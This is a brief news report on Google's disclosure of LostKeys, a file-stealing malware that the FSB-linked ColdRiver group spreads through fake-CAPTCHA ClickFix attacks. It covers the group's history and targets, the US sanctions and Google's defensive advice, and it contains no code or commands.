Google has announced (through Android Headlines) the discovery of a new malware known as LostKeys, utilized by the hacking collective ColdRiver, which has ties to the Russian FSB. This software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is employed in targeted ClickFix attacks that leverage social engineering tactics, starting with a counterfeit CAPTCHA. Victims are tricked into executing malicious PowerShell scripts that pave the way for downloading and executing additional harmful software. The main objective is the installation of LostKeys, which operates as a digital vacuum, extracting files, directories, and system information. Hackers also utilize other malicious programs, including SPICA, to gain access to documents.

The ColdRiver group has been active since 2017 and is also known by names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its operations in recent years, particularly following Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and NGOs.

The United States has already imposed sanctions against specific group members and announced a reward of $10 million for information leading to their arrest.

Google experts emphasize the necessity of enhancing cybersecurity measures, especially for organizations that may become potential targets of ColdRiver attacks. They recommend employing Google's advanced protection and regularly updating security systems to prevent such threats.